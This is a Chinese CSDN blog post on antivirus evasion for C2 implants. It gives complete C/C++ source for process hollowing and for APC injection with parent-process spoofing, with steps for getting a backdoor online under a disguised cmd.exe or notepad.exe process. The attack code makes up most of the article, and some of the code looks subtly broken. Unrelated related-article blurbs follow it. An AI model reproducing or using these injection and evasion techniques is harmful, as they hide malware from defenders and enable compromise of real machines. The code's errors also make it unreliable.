【免杀】C2远控-APC注入-进程镂空

最新推荐文章于 2025-03-26 20:58:47 发布
最新推荐文章于 2025-03-26 20:58:47 发布
阅读量1.6k 收藏 24
点赞数 23
文章标签: 网络安全 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55349490/article/details/139583350
版权

目录

进程镂空&傀儡进程(主要过内存扫描)

进程镂空(Process Hollowing)
是一种防御规避的进程注入技术,以红队隐匿技能为主的辅助免杀手法

代码
#include <stdio.h>
#include <Windows.h>

typedef NTSTATUS(NTAPI* pNtUnmapViewOfSection)(HANDLE, PVOID);

int main(int argc, wchar_t* argv[])
{
	IN PIMAGE_DOS_HEADER pDosHeaders;
	IN PIMAGE_NT_HEADERS pNtHeaders;
	IN PIMAGE_SECTION_HEADER pSectionHeaders;

	IN PVOID FileImage;

	IN HANDLE hFile;
	OUT DWORD FileReadSize;
	IN DWORD dwFileSize;

	IN PVOID RemoteImageBase;
	IN PVOID RemoteProcessMemory;




	STARTUPINFOA si = { 0 };
	PROCESS_INFORMATION pi = { 0 };
	CONTEXT ctx;
	ctx.ContextFlags = CONTEXT_FULL;
	si.cb = sizeof(si);


	char path[] = "HelloWorld.exe";
	BOOL bRet = CreateProcessA(
		NULL,
		(LPSTR)"calc",
		NULL,
		NULL,
		FALSE,
		CREATE_SUSPENDED,
		NULL,
		NULL,
		&si,
		&pi);

	//在本进程获取替换文件的内容
	hFile = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	dwFileSize = GetFileSize(hFile, NULL); //获取替换可执行文件的大小
	FileImage = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	ReadFile(hFile, FileImage, dwFileSize, &FileReadSize, NULL);
	CloseHandle(hFile);

	pDosHeaders = (PIMAGE_DOS_HEADER)FileImage;
	pNtHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)FileImage + pDosHeaders->e_lfanew); //获取NT头

	GetThreadContext(pi.hThread, &ctx); //获取挂起进程上下文

#ifdef _WIN64
	ReadVirtualMemory(pi.hProcess, (PVOID)(ctx.Rdx + (sizeof(SIZE_T) * 2)), &RemoteImageBase, sizeof(PVOID), NULL);
	// 从rbx寄存器中获取PEB地址,并从PEB中读取可执行映像的基址
#endif
	// 从ebx寄存器中获取PEB地址,并从PEB中读取可执行映像的基址
#ifdef _X86_
	ReadProcessMemory(pi.hProcess, (PVOID)(ctx.Ebx + 8), &RemoteImageBase, sizeof(PVOID), NULL);
#endif

	//判断文件预期加载地址是否被占用
	pNtUnmapViewOfSection NtUnmapViewOfSection = (pNtUnmapViewOfSection)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
	if ((SIZE_T)RemoteImageBase == pNtHeaders->OptionalHeader.ImageBase)
	{
		NtUnmapViewOfSection(pi.hProcess, RemoteImageBase); //卸载已存在文件
	}

	//为可执行映像分配内存,并写入文件头
	RemoteProcessMemory = VirtualAllocEx(pi.hProcess, (PVOID)pNtHeaders->OptionalHeader.ImageBase, pNtHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(pi.hProcess, RemoteProcessMemory, FileImage, pNtHeaders->OptionalHeader.SizeOfHeaders, NULL);

	//逐段写入
	for (int i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++)
	{
		pSectionHeaders = (PIMAGE_SECTION_HEADER)((LPBYTE)FileImage + pDosHeaders->e_lfanew + sizeof(IMAGE_NT_HEADERS) + (i * sizeof(IMAGE_SECTION_HEADER)));
		WriteProcessMemory(pi.hProcess, (PVOID)((LPBYTE)RemoteProcessMemory + pSectionHeaders->VirtualAddress), (PVOID)((LPBYTE)FileImage + pSectionHeaders->PointerToRawData), pSectionHeaders->SizeOfRawData, NULL);
	}

	//将rax寄存器设置为注入软件的入口点
#ifdef _WIN64
	ctx.Rcx = (SIZE_T)((LPBYTE)RemoteProcessMemory + pNtHeaders->OptionalHeader.AddressOfEntryPoint);
	WriteProcessMemory(pi.hProcess, (PVOID)(ctx.Rdx + (sizeof(SIZE_T) * 2)), &pNtHeaders->OptionalHeader.ImageBase, sizeof(PVOID), NULL);
#endif

	//将eax寄存器设置为注入软件的入口点
#ifdef _X86_
	ctx.Eax = (SIZE_T)((LPBYTE)RemoteProcessMemory + pNtHeaders->OptionalHeader.AddressOfEntryPoint);
	WriteProcessMemory(pi.hProcess, (PVOID)(ctx.Ebx + (sizeof(SIZE_T) * 2)), &pNtHeaders->OptionalHeader.ImageBase, sizeof(PVOID), NULL);
#endif


	SetThreadContext(pi.hThread, &ctx); // 设置线程上下文
	ResumeThread(pi.hThread); // 恢复挂起线程

	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
	return 0;
}

1.创建一个挂起合法进程
2.读取执行代码
3.获取挂起进程上下文与环境信息
4.卸载挂起进程内存
5.写入执行代码
6.恢复挂起进程

傀儡进程演示
  • 将代码生成的程序打开,并用进程监控工具进行监控
    刚打开时会发现存在有这个进程。project1.exe

    然后等一下就发现它不见了。其实是变成了cmd.exe(变成什么进程我们是可以在代码里面控制的)

    控制的代码位置
如何上线
  • 这里有两种上线方式,一直是用后门程序,一种是用后门代码

    后门程序: 将你的后门程序写入代码中,让它去运行,如这里是HelloWorld.exe
    后门代码: 将你的后门代码写在这里
    这里推荐第二种方式(第一种必须要满足 两个程序都要实现免杀才行)
上线演示
  • 先生成一个上线程序
  • 将上线后门改成 HelloWorld.exe 与代码当中一样,和代码程序放在同一个目录
  • 运行 project1.exe,会发现已经上线,且进程里面没有project.exe 只有一个傀儡进程cmd.exe

APC注入&进程欺骗(主要过内存扫描)

APC全称为Asynchronous Procedure Call,叫异步过程调用,
是指函数在特定线程中被异步执行,在操作系统中是并发机制。

同步调用与异步调用

同步调用:
我们需要去烧水,首先我们先去需 要给水壶添水,然后将水壶连接上电之后,然后加热,等水烧开了然后取水,在烧水的等待的时间中,我们不去做任何事情。这就是同步。
异步调用:
就是我们在烧水的等待的过程中去干一些其他的事情,比如玩手机,打扫卫生等等。

流程
1、获取父进程PID
2、获取当前进程权限
3、创建并分配写入内存
4、写入SC并APC进行调用
APC注入 配合进程注入实现父进程欺骗

代码
// Parent spoofing.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
#include <TlHelp32.h>
#include <fstream>
using namespace std;
DWORD getParentProcessID()
{
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 process = { 0 };
    process.dwSize = sizeof(process);
    if (Process32First(snapshot, &process))
    {
        do
        {
            if (!wcscmp(process.szExeFile, L"explorer.exe"))
            {
                printf("Find explorer failed!\n");
                break;
            }
        } while (Process32Next(snapshot, &process));
    }
    CloseHandle(snapshot);
    return process.th32ProcessID;
}
int main()
{
    unsigned char shellCode[] = "你的shellcode";

   
  
    
    STARTUPINFOEXA sInfoEX;
    PROCESS_INFORMATION pInfo;
    SIZE_T sizeT;
    //打开explorer进程获取当前进程所有权限
    HANDLE expHandle = OpenProcess(PROCESS_ALL_ACCESS, false, getParentProcessID());
    //用0填充数组
    ZeroMemory(&sInfoEX, sizeof(STARTUPINFOEXA));
    //初始化指定的属性列表,创建进程和线程
    InitializeProcThreadAttributeList(NULL, 1, 0, &sizeT);
    //设置进程属性并从堆中分配内存
    sInfoEX.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeT);
    InitializeProcThreadAttributeList(sInfoEX.lpAttributeList, 1, 0, &sizeT);
    //更新用于进程和线程创建的属性列表中的指定属性
    UpdateProcThreadAttribute(sInfoEX.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &expHandle, sizeof(HANDLE), NULL, NULL);

    sInfoEX.StartupInfo.cb = sizeof(STARTUPINFOEXA);
    CreateProcessA("C:\\Windows\\System32\\notepad.exe",
        NULL,
        NULL,
        NULL,
        TRUE,
        CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT,
        NULL,
        NULL,
        reinterpret_cast<LPSTARTUPINFOA>(&sInfoEX),
        &pInfo);
    //分配内存
    LPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pInfo.hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    SIZE_T* lpNumberOfBytesWritten = 0;
    //写入内存
    BOOL resWPM = WriteProcessMemory(pInfo.hProcess, lpBaseAddress, (LPVOID)shellCode, sizeof(shellCode), lpNumberOfBytesWritten);
    // APC调用
    QueueUserAPC((PAPCFUNC)lpBaseAddress, pInfo.hThread, NULL);
    //启动线程
    ResumeThread(pInfo.hThread);
    CloseHandle(pInfo.hThread);
    return 0;
}
演示
  • 写入shellcode并生成程序
  • 这里我生成的程序是 project3.exe,执行程序,并用进程监控软件进行监控

    执行后会发现直接就是 notepad.exe,并没有像进程镂空那样先显示 Project1.exe 再转换为傀儡进程
为几何欢
关注
使用进程镂空技术360Defender
u013797594的博客
05-05 5241
使用进程镂空技术360Defender,工具风暴
实战shell&C2&工具魔改(日记 - 上篇)
guanjian_ci的博客
06-05 7148
1、上面实验内容并不多,但是工具的使用、环境的安装、代码的排错够新手玩上几天了。2、绕过毒软件的本质就是防止被毒库匹配,代码、工具指纹等等!3、一个好的,一定具备了多方面的性能:防软、绕过流量平台、防沙箱、防逆向调试后依然能够正常运行上线!4、此文章分上 、 中 、下,未完待续... ...
5-进程掏空Process Hollowing
weixin_40332490的博客
01-05 1157
Process Hollowing又叫进程镂空进程掏空技术,属于进程注入的一种。其主要功能是将恶意代码注入到签名过的合法进程中(例如:Microsoft更新包、安装程序、Windows系统程序等),从而实现使用合法进程执行恶意代码的目的,躲过安全软件的检测与查。与普通的DLL注入等不同的是,Process Hollowing是创建新的进程而不是对现有的进程进行操作,且不需要调用CreateRemoteThread这个毒软件主要检测的API。
进程注入说人话系列:Windows API安全实战-APC注入
最新发布
weixin_57393703的博客
03-26 1621
所以,Windows设计了可警醒状态,让APC安全的时机(比如线程在等待时)执行。进程挂了,线程全完蛋;简单说,线程只有在“有空”的时候,才会去处理APC队列里的任务。APC执行时,借用线程的上下文,跑在进程的地址空间里。进程管着线程,线程管着APC队列,所以APC最终还是得看进程这大哥的脸色。线程忙着跑代码,APC说:“哥,等你喘口气,帮我跑个腿”。注意:APC是借用目标线程的上下文执行的,用的是线程的堆栈和寄存器,不是开新线程跑。APC是异步排队的,但执行是同步的,得等线程配合(进入可警醒状态)。
APC注入
推理小孩的博客
02-22 291
APC注入 0X01 注入原理       当线程被唤醒时APC中的注册函数会被执行的机制,并依此去调用我们的DLL加载代码,进而完成注入的目的             具体的流程:             1 当EXE里的某个线程执行到sleepEX(),或者waitForSingleObjectEX()(其实还有WaitForMultipleO...
DLL注入-APC注入
天使也掉毛
11-25 5779
DLL注入-APC注入
常见注入手法第二讲,APC注入
weixin_30340617的博客
09-22 294
                  常见注入手法第二讲,APC注入 转载注明出处 首先,我们要了解下什么是APC APC 是一个简称,具体名字叫做异步过程调用,我们看下MSDN中的解释,异步过程调用,属于是同步对象中的函数,所以去同步对象中查看. 首先介绍一下APC,会了正想开发就会逆向注入 首先第一个函数 QueueUserApc: 函数作用,添加制定的异步函数调用(回调函...
一个窗口镂空程序(挖洞.zip)
05-12
应网友要求,一个窗口镂空程序。说明 CreateRectRgn(0, 0, cx+A_BIT_MORE, cy+A_BIT_MORE); CombineRgn(&wndRgn;, &rgnTemp;, RGN_DIFF); SetWindowRgn(wndRgn,FALSE); 等CRgn函数的使用
注入(一):APC注入
零点起步
04-14 1747
APC注入:Asynchronous Procedure Call,异步过程调用,每个线程都有一个APC队列,在用户模式下,当线程调用SleepEx,WaitForSingleObjectEx等进入"Alterable Wait Status.  此时系统会遍历APC队列,先进先出地处理其中函数(QueueUserAPC)  优:比较隐蔽 缺:实现的条件苛刻 //负责注入的exe #incl
APC注入APCInject(DLL)
weixin_34259559的博客
10-20 374
https://github.com/haidragon/win10_UserApcInjectAPC注入的原理是利用当线程被唤醒时APC中的注册函数会被执行的机制,并以此去执行我们的DLL加载代码,进而完成DLL注入的目的,其具体流程如下:1)当EXE里某个线程执行到SleepEx()或者WaitForSingleObjectEx()时,系统就会产生一个软中断(或者是Messagebox弹窗的时...
DLL注入APC注入
GeniusLS的博客
08-13 1079
本人学习《Windows编程技术》所做的学习笔记 简介:APC为异步调用,指函数在特定线程中被异步执行,在操作系统中,APC是一种并发机制,用于异步IO,或者定时器。 大致思路:每一个进程中都有一个APC队列,每当要执行一个函数时,就利用QueueUserAPC函数把一个APC函数压入队列中,当函数要被执行时,我们将函数以先进先出的形式执行函数,此时我们便可以把我们要注入的dll给放入队列中 同步调用:像普通程序一样,需要按序进行,下一条代码必须要等上一条代码执行后,才能运行。 异步调用:...
APC_dll注入
qq_36918532的博客
03-03 541
主要是以下五步 //注入器 //1.要注入进程中首先要拿到进程ID //2.获取到LoadLibrary地址 //3.在目标程序的体内开辟一块内存,用来写入dll地址 //4.遍历线程-随便选一个目标进程的线程获取句柄 //5.插入APC,把LoadLibrary作为APC的回调参数,然后把目标进程的dll地址作为参数 #include<stdio.h> #include<stdlib.h> #include<Windows.h> #include<TlHelp3
如何在Unity中使用Shader实现具有动画效果的圆形镂空遮罩?
11-11
Unity中实现具有动画效果的圆形镂空遮罩,关键在于掌握片元着色器(Fragment Shader)的应用。通过定义遮罩的位置、大小以及动画的变化,我们可以创建出引人注目的视觉效果。具体步骤如下: 参考资源链接:[Unity新手引导:镂空遮罩与动画Shader实现详解](https://wenku.csdn.net/doc/e0erfk9ejz?spm=1055.2569.3001.10343) 首先,定义圆形镂空遮罩的核心参数,包括中心点(_Center),半径(_Radius),过渡范围(_TransitionRange),以及当前时间(Time.timeSinceLevelLoad)。 接着,在片元着色器中,使用`distance`函数计算片元的世界坐标(IN.worldPosition.xy)与中心点之间的距离(dis)。然后利用`clip`函数进行条件判断,仅保留那些距离大于半径减去过渡范围的片元,其余片元被剪切掉。 为了实现动画效果,需要在着色器中加入时间变量(Time.timeSinceLevelLoad),并结合总动画时长(_TotalTime)和减少时间(_ReduceTime),计算出当前动画的进程时间(processTime)。根据这个值,调整alpha值的变化,以实现动画效果。 `step`函数可以在指定的阈值处突然改变alpha值,当片元在圆心的指定距离之内时,alpha值可以逐渐降低,实现一个平滑的过渡效果。 示例代码可能如下所示(代码片段、概念解释、可能遇到的问题与解决方案,此处略)。 综上所述,通过细致地制遮罩参数和动画进程,可以在Unity中实现具有动态效果的圆形镂空遮罩。学习和实践这些技术可以显著提升游戏或应用的视觉层次。为了更深入地了解和掌握Unity Shader的使用,建议参考《Unity新手引导:镂空遮罩与动画Shader实现详解》。该资源提供了详细的解释和代码示例,适合想要深入学习Unity Shader技术并应用于实际项目的开发者。 参考资源链接:[Unity新手引导:镂空遮罩与动画Shader实现详解](https://wenku.csdn.net/doc/e0erfk9ejz?spm=1055.2569.3001.10343)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值